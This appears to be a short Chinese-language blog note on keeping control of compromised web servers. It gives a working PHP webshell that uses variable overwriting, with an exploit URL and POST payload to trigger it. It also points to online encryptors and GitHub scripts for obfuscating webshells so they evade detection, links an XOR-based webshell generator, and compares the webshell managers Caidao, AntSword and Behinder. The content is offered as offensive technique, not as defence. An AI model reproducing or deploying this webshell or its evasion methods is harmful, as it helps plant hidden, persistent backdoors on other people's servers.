权限控制之代码混淆及行为造轮子

浏览 103 扫码分享 2023-03-25 09:18:23

Tip:
代码内容绕过：
WebShell管理工具：

权限控制之代码混淆及行为造轮子 - 图1

Tip:

代码内容绕过：

①变量覆盖

# 源代码
<?php
$a = $_GET[‘x’];
$$a = $_GET[‘y’];
$b($_POST[‘z’]);
?>

EXP:
http(s)://target/?x=b&y=assert
POST—>z=phpinfo()

②加密混淆

简单在线加密：https://www.toolnb.com/tools/phpcarbylamine.html

复杂在线加密(效果更好)：https://www.phpjiami.com/phpjiami.html

脚本加密：（PHP）https://github.com/djunny/enphp（使用详情看工具库Webshell免杀篇）

③异或生成

脚本下载地址：https://github.com/814561039/webshell-venom（java、php等环境均有）

WebShell管理工具：

菜刀、蚁剑、冰蝎优缺点：

菜刀：

未更新状态，无插件，单向加密传输

蚁剑（扩展性强）：

更新状态，有插件，单向加密传输

冰蝎（偏向于后渗透）：

更新状态，未知插件，双向加密传输

若有收获，就点个赞吧

上一篇:

下一篇:

让时间为你证明

展开/收起文章目录